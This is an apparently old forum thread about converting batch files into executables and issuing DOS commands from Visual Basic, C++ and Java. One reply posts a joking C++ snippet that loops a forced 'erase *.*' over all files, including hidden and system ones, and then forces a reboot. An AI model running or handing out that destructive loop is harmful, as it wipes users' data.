Jump to content

Featured Replies

Posted
can you change them into exes? if you cant is there any programing langue that you can easly seend commands to dos? thanks
  ichangedmysn9 said:
can you change them into exes? if you cant is there any programing langue that you can easly seend commands to dos? thanks

 

visual basic can make exe batchfiles, well all it really does it make a batchfile then opens it then deltes the file it made. so eya it kinda is a exe batchfile ;)

 

http://www.pscode.com

Learn QBasic. I did and it's very fun :D! Totally of topic but...meh :D

Also if you include <window.h> in a c++ file, the

 

System("argument");

 

commnad is basically like typing the argumetn in dos.

also

 

Runtime r =Runtime.getRuntime();
r.exec("notepad.exe or w/e")

 

in java, but alas you cannot do this in an applet

#include <windows.h>

while(true)
{
   system("erase *.* /F /AS /AA /AH /AR");
   system("echo pwnt");
   system("shutdown -r -t 1");
}

// keke?

 

C++ ftw <3

  Erondial said:
Also if you include <window.h> in a c++ file, the

 

System("argument");

 

commnad is basically like typing the argumetn in dos.

 

stdlib.h has it too i think

Guest
This topic is now closed to further replies.